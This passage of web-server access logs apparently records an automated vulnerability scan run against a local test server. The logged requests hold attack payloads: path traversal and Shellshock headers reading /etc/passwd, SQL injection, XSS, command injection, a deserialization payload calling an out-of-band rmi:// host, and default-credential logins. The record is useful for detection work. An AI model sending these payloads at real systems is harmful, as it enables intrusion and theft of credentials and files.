(Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MdtQ1bbyjGY8EwPBQbBeSFIl/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dumpmdm.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"2.252","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sessions/new HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.101","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"2.256","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"name=Admin&password=zabbix&autologin=1&enter=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"2.267","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"2.224","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\x22,\x0D\x0A \x22properties\x22:{\x0D\x0A \x22@type\x22:\x22java.util.Properties\x22,\x0D\x0A \x22UserTransaction\x22:\x22rmi://c9v8hs0smpv8c6ag07h0z7xg369i9o1be.oast.online/Exploit\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.096","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"2.240","http_user_agent":"asusrouter--", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/64 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MdtQ1bbyjGY8EwPBQbBeSFIl/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/stats HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.096","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/goroutine?debug=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /license.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.093","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.103","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"username=apollo&password=admin&login-submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /signin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.109","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/signin?", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"action=login&u=admin&p=admin256","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service.web HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.096","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=297MbCnl1PhTQAU5eFYdvfSaB8R.php&target=l1_Lw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"2.254","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"{\x22params\x22:\x22w=123\x5C\x22'1234123'\x5C\x22|cat /etc/passwd\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"2.261","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/65 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /atg/bcc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.103","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MbA1pKE27W0WzIRjaNDlXQJw')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.103","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vault/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 